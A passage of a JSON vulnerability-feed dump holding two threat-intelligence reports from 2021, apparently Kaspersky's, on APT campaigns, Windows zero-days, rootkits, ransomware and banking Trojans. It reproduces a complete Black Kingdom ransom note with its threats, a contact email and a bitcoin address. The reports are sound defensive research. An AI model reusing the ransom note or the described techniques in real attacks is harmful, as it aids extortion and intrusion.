This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. 
Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. 
Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. 
Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. 
Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit. 
While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. 
Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n## Targeted attacks\n\n### The leap of a Cycldek-related threat actor\n\nIt is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload, 
generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.\n\nWe recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nHowever, in this case, the shellcode was heavily obfuscated \u2013 the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.\n\nIn the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com \u2013 all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802. 
All of these documents were blank, suggesting the existence of precursor documents \u2013 possibly delivered by means of spear-phishing or a previous infection \u2013 that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware \u2013 named DropPhone and CoreLoader.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\nOur telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.\n\nWhile Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign \u2013 which is why we attribute the campaign, with low confidence, to this threat actor.\n\n### Zero-day vulnerability in Desktop Window Manager used in the wild\n\nWhile analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). 
Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.\n\nWe believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.\n\nYou can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n### Operation TunnelSnake\n\nWindows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. 
Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.\n\nNevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.\n\nOne such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)\n\nThis tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.\n\nSince neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure. 
However, the bulk of the detected tools besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\n### PuzzleMaker\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.\n\nWhile we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.\n\nOn April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.\n\nThe exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turns connects to the C2 to get commands.\n\nWe weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\n### Andariel adds ransomware to its toolset\n\nIn April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload. 
Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)\n\nDuring the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.\n\nHistorically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)\n\nWe also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.\n\nNotably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlying the financial motivation of this threat actor.\n\n### Ferocious Kitten\n\n[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran. 
The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). 
Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).\n\nAs a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.\n\nWe recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)\n\nEach "re-branded" version has included alterations to different aspects of the code \u2013 file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.\n\n### Black Kingdom ransomware\n\n[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). 
This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.\n\nThe malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. 
So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nAfter decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key. 
We were not able to attribute Black Kingdom to any known threat group.\n\nBased on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.\n\n### Gootkit: the cautious banking Trojan\n\n[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.\n\nIt is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploits kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.\n\nGootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.\n\nIn 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.\n\n### Bizarro banking Trojan expands into Europe\n\nBizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy. 
This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)\n\nAs with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.\n\nBizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)\n\nBizarro is one of several banking Trojans from South America that have extended their operations into other regions \u2013 mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)\n\n### Malicious code in APKPure app\n\nIn early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. 
[The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.\n\nWhen launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).\n\nWe reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.\n\n### Browser lockers\n\nBrowser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.\n\nThis type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. 
The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.\n\nIn our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)\n\nBoth families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).\n\nThese threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirror tactics.\n\n### Malware targets Apple M1 chip\n\nLast November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. 
Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\n### Attempted supply-chain attack using PHP\n\nIn March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the GIT version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, in around 80 per cent of which (web servers) PHP is used.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:37", "type": "securelist", "title": "IT threat evolution Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2019-11510", "CVE-2021-1732", "CVE-2021-27065", "CVE-2021-28310", 
